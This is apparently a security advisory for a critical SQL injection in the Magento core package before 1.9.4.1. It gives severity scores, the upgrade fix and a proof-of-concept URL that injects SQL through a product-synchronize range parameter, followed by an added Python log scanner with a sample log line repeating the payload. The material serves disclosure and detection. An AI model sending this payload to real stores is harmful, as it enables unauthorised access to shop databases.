SQL Injection Affecting magento/core package, versions <1.9.4.1


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 0.58% (78th percentile)
NVD
9.8 critical

  • Snyk ID SNYK-PHP-MAGENTOCORE-174031
  • published 30 Mar 2019
  • disclosed 29 Mar 2019
  • credit Charles Fol, Ambionics Security

How to fix?

Upgrade magento/core to version 1.9.4.1 or higher.

Overview

magento/core is a release of the Magento Community Edition.

Affected versions of this package are vulnerable to SQL Injection. A bug present in both internal/Magento/Framework/DB/Adapter/Pdo/Mysql.php and lib/Varien/Db/Adapter/Pdo/Mysql.php allows an SQL injection vector in Magento\Catalog\Controller\Product\Frontend\Action\Synchronize.

PoC

by Charles Fol

    https://magento2website.com/catalog/product_frontend_action/synchronize?
    type_id=recently_products&
    ids[0][added_at]=&
    ids[0][product_id][from]=?&
    ids[0][product_id][to]=))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -
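
One way to review web server logs for requests shaped like the PoC above, as an added example that is not part of the original advisory or of Magento's code. It assumes combined-format access logs and that ordinary storefront requests to this endpoint send scalar ids values with no from/to keys; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path of the endpoint named in the advisory's PoC (a store-code or
# index.php prefix may precede it, hence the endswith() check below).
ENDPOINT = "/catalog/product_frontend_action/synchronize"
# A from/to range condition nested under ids[...][field].
RANGE_KEY = re.compile(r"^ids\[[^\]]*\]\[[^\]]*\]\[(?:from|to)\]$")
# Request line of a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def range_params(line):
    """Return decoded (key, value) range parameters sent to the endpoint."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.rstrip("/").endswith(ENDPOINT):
        return []
    # parse_qsl percent-decodes keys and values, so encoded brackets match.
    pairs = parse_qsl(url.query, keep_blank_values=True)
    # Assumption: legitimate clients never send from/to keys here.
    return [(k, v) for k, v in pairs if RANGE_KEY.match(k)]


def scan(lines):
    """Return (client_ip, params) for every log line worth reviewing."""
    hits = []
    for line in lines:
        params = range_params(line)
        if params:
            hits.append((line.split()[0], params))
    return hits


# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Apr/2019:10:00:00 +0000] "GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids%5B0%5D%5Badded_at%5D=1554112800&ids%5B0%5D%5Bproduct_id%5D=42 HTTP/1.1" 200 2',
    '198.51.100.9 - - [01/Apr/2019:10:00:05 +0000] "GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids%5B0%5D%5Badded_at%5D=&ids%5B0%5D%5Bproduct_id%5D%5Bfrom%5D=%3F&ids%5B0%5D%5Bproduct_id%5D%5Bto%5D=%29%29%29+OR+%28SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1%3D1%29+--+- HTTP/1.1" 200 2',
    '203.0.113.8 - - [01/Apr/2019:10:00:09 +0000] "GET /catalogsearch/advanced/result/?price%5Bfrom%5D=10&price%5Bto%5D=20 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(client, params)
```

Only query-string parameters appear in access logs, so the same request sent with its parameters in a POST body would need request-body logging or a WAF rule to be seen.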